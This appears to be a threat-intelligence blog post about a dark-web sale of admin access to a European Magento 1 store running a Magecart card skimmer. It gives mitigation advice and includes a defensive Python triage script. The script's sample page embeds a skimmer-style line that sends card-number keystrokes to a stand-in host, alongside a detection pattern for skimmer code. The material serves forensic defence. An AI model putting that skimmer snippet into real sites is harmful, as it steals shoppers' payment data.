Dark Web News Analysis: Admin Access to European E-Commerce Site with Credit Card Skimmer on Sale
A threat actor is selling administrator-level access to a European e-commerce company that operates in the Netherlands, Belgium, France, and Germany. The access is not just control of the site: it includes an active payment interception capability, meaning the website is currently stealing its customers’ credit card information. The sale, posted on a hacker forum, highlights a critical failure of the company’s security, as the store is running on a dangerously outdated version of Magento. The assets and capabilities for sale include:
- Platform: Magento version 1.9.4.5 (End-of-Life since June 2020).
- Access Level: Full administrative privileges.
- Key Capability: The ability to inject JavaScript into the site to intercept and skim live customer payment information, including MasterCard, Visa, Maestro, PayPal, and Ideal details.
- Price: Starting at $3,000, with a blitz (buy-it-now) price of $10,000.
Key Cybersecurity Insights
This incident is a textbook example of a “Magecart” attack, enabled by the use of obsolete and insecure e-commerce software.
- A Classic “Magecart” Attack in Progress: The attacker’s description of injecting JavaScript to intercept payment information is the exact methodology of a Magecart attack. This means the website is actively skimming the credit card details of its customers in real time as they type them in. The buyer of this access isn’t just getting a key; they are buying an already-running, profitable criminal operation.
- End-of-Life Magento 1 is a Ticking Time Bomb: Magento 1 reached its official end-of-life in June 2020. This means the platform has not received any official security patches from Adobe for over five years. Running a live e-commerce store that processes payments on this platform is grossly negligent and exposes the business and its customers to a vast number of well-known, unpatched, and easily exploitable vulnerabilities.
- Multi-Country Operation Puts Thousands of European Consumers at Risk: Since the e-commerce store operates in the Netherlands, Belgium, France, and Germany, the ongoing credit card skimming affects a broad European customer base. This also means the company is in severe violation of the General Data Protection Regulation (GDPR) for failing to secure customer data, which will inevitably lead to a massive fine.
Critical Mitigation Strategies
This is an active financial crime in progress. The responsible company must take immediate and drastic action, and any customers who have used the site are at immediate risk of fraud.
- For the Affected Company: Immediately Take the Website Offline and Investigate: As this is an active payment skimming operation, the only responsible action is to take the website offline immediately to stop the theft of more customer credit cards. A full forensic investigation (compromise assessment) is needed to find the malicious skimming code and identify the source of the administrative account compromise.
- For the Affected Company: Migrate Off Magento 1 Immediately: Patching is not an option for unsupported, end-of-life software. The company must urgently migrate its store to a modern, supported e-commerce platform (such as the latest version of Magento or a secure alternative) and completely rebuild from a known-good, secure state.
- For Customers Who Have Used the Site: Contact Your Bank and Cancel Your Card: This is the most critical advice for potential victims. Anyone who has made a purchase on a European e-commerce site that they suspect may be compromised should assume their credit card details have been stolen. They should immediately contact their bank or credit card provider to report the potential fraud and have their card canceled and reissued.
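As an added illustration of the forensic step above (not code from the original post or from the affected store), the script below shows one way an investigator can triage a checkout page for injected JavaScript: every script element is compared against a baseline of allowed external hosts and SHA-256 hashes of known-good inline code, and any unknown inline script that touches payment fields is flagged with top priority. The sample page, the baseline values and the *.invalid hostnames are all constructed for this example.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample checkout page (not a real store): one first-party script, one
# known inline script, one unlisted external script, one inline skimmer-style script.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/js/varien/form.js"></script>
<script>var checkoutConfig = {step: 'payment'};</script>
<script src="https://cdn.example-skimmer.invalid/jquery.min.js"></script>
<script>var f=document.querySelector('#cc_number');f.addEventListener('keyup',function(){new Image().src='https://collect.example-skimmer.invalid/?d='+btoa(f.value);});</script>
</head><body></body></html>"""

# Baseline taken from a known-good copy of the store ("" = relative, first-party src).
ALLOWED_SCRIPT_HOSTS = {"", "shop.example.invalid"}
KNOWN_INLINE_HASHES = {hashlib.sha256(b"var checkoutConfig = {step: 'payment'};").hexdigest()}
# Tokens typical of skimmer code: payment field names plus beaconing/encoding primitives.
SUSPICIOUS = re.compile(r"cc_number|cvv|card|new Image\(\)\.src|btoa|atob|eval", re.I)

class ScriptCollector(HTMLParser):
    # Collects (src, inline body) for every <script> element, in document order.
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._src, self._buf = [], False, None, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False

def find_unexpected_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, known_hashes=KNOWN_INLINE_HASHES):
    # Returns a (reason, detail) tuple for each script that deviates from the baseline.
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src is not None:  # external script: its host must be on the allowlist
            if urlparse(src).netloc not in allowed_hosts:
                findings.append(("external-unlisted-host", src))
        elif hashlib.sha256(body.encode()).hexdigest() not in known_hashes:
            reason = "inline-unknown-hash"
            if SUSPICIOUS.search(body):  # unknown AND touches payment data: triage first
                reason += "+payment-field-access"
            findings.append((reason, body[:60]))
    return findings
```

Running `find_unexpected_scripts(SAMPLE_CHECKOUT_HTML)` on the sample reports the unlisted CDN host and the inline script reading the card-number field, while the two baseline scripts produce no findings.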
Secure Your Organization with Brinztech
As a cybersecurity provider, we can protect your business from the threats discussed here. Contact us to learn more about our services.
Questions or Feedback?
For expert advice, use our ‘Ask an Analyst’ feature. For general inquiries or to report this post, please email us: contact@brinztech.com